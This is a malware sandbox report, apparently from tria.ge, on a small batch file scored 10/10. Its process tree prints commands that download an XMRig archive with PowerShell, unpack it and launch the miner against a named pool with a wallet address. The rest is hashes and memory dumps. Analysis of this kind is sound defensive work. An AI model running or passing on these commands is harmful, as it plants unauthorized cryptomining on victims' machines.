Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

tesy - Copy (10).bat

windows7-x64

10

tesy - Copy (10).bat

windows10-2004-x64

10

tesy - Copy (11).bat

windows7-x64

10

tesy - Copy (11).bat

windows10-2004-x64

10

tesy - Copy (12).bat

windows7-x64

10

tesy - Copy (12).bat

windows10-2004-x64

10

tesy - Copy (13).bat

windows7-x64

10

tesy - Copy (13).bat

windows10-2004-x64

10

tesy - Copy (14).bat

windows7-x64

10

tesy - Copy (14).bat

windows10-2004-x64

10

tesy - Copy (2).bat

windows7-x64

10

tesy - Copy (2).bat

windows10-2004-x64

10

tesy - Copy (3).bat

windows7-x64

10

tesy - Copy (3).bat

windows10-2004-x64

10

tesy - Copy (4).bat

windows7-x64

10

tesy - Copy (4).bat

windows10-2004-x64

10

tesy - Copy (5).bat

windows7-x64

10

tesy - Copy (5).bat

windows10-2004-x64

10

tesy - Copy (7).bat

windows7-x64

10

tesy - Copy (7).bat

windows10-2004-x64

10

tesy - Copy (8).bat

windows7-x64

10

tesy - Copy (8).bat

windows10-2004-x64

10

tesy - Copy (9).bat

windows7-x64

10

tesy - Copy (9).bat

windows10-2004-x64

10

tesy - Copy.bat

windows7-x64

10

tesy - Copy.bat

windows10-2004-x64

10

tesy.bat

windows7-x64

10

tesy.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    0s
  • max time network
    40s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/12/2023, 05:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tesy - Copy (14).bat

  • Size

    608B

  • MD5

    727c8da0478af118c957ae60f7161cab

  • SHA1

    cf18105b8659e93bbd2824fa35ef1bae7b395301

  • SHA256

    97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

  • SHA512

    d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Signatures

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (14).bat"
    1⤵
      PID:5108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
        2⤵
          PID:5060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
          2⤵
            PID:4548
          • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
            xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
            2⤵
              PID:1844

          Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            a2b24af1492f112d2e53cb7415fda39f

            SHA1

            dbfcee57242a14b60997bd03379cc60198976d85

            SHA256

            fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

            SHA512

            9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0zjseriz.erh.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0-gcc-win64.zip
            Filesize

            162KB

            MD5

            2e50552005231ca4a1e4e7d6cf03ee52

            SHA1

            0bbd7c548a8d37212cdee14ced57a7a3af474576

            SHA256

            558a61f76160309c83a0ca449cf7753120227e3b870560d12840d4fd016638c0

            SHA512

            b3efc1df7ed95f0ca27ab47d6bd229727fc2d283937fa1af71d659b715718288ed3dc1103500f9420ec60d2d83d678a9eaeabcae1fbb31f0245f3f03cc2519c7

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
            Filesize

            160KB

            MD5

            9ae98ea39c927ac01f233e5de8d30d2b

            SHA1

            82f08ab25d493c4d1ea04581c12beb28a17279d0

            SHA256

            af949ada2906e733562f682d802461146f0389e074411d5273e8a5a963a36129

            SHA512

            d3c2d826ca7663ba25fabb64f171ed52e2e1056e987ac820467398da198edc89a1054afe6dff8c8cafc073aa31b710b6a6e482943f30203586cd12027cb841d9

            Download Submit

          • memory/1844-59-0x0000026524890000-0x00000265248B0000-memory.dmp

            Filesize

            128KB

            Download

          • memory/4548-30-0x000002499B9C0000-0x000002499B9D0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4548-29-0x000002499B9C0000-0x000002499B9D0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4548-28-0x00007FFDE0320000-0x00007FFDE0DE1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4548-31-0x000002499B9C0000-0x000002499B9D0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4548-33-0x00000249B4560000-0x00000249B456A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/4548-32-0x00000249B4570000-0x00000249B4582000-memory.dmp

            Filesize

            72KB

            Download

          • memory/4548-56-0x00007FFDE0320000-0x00007FFDE0DE1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/5060-16-0x00007FFDE0320000-0x00007FFDE0DE1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/5060-11-0x0000024ED71C0000-0x0000024ED71D0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/5060-12-0x0000024ED71C0000-0x0000024ED71D0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/5060-10-0x00007FFDE0320000-0x00007FFDE0DE1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/5060-2-0x0000024EBF060000-0x0000024EBF082000-memory.dmp

            Filesize

            136KB

            Download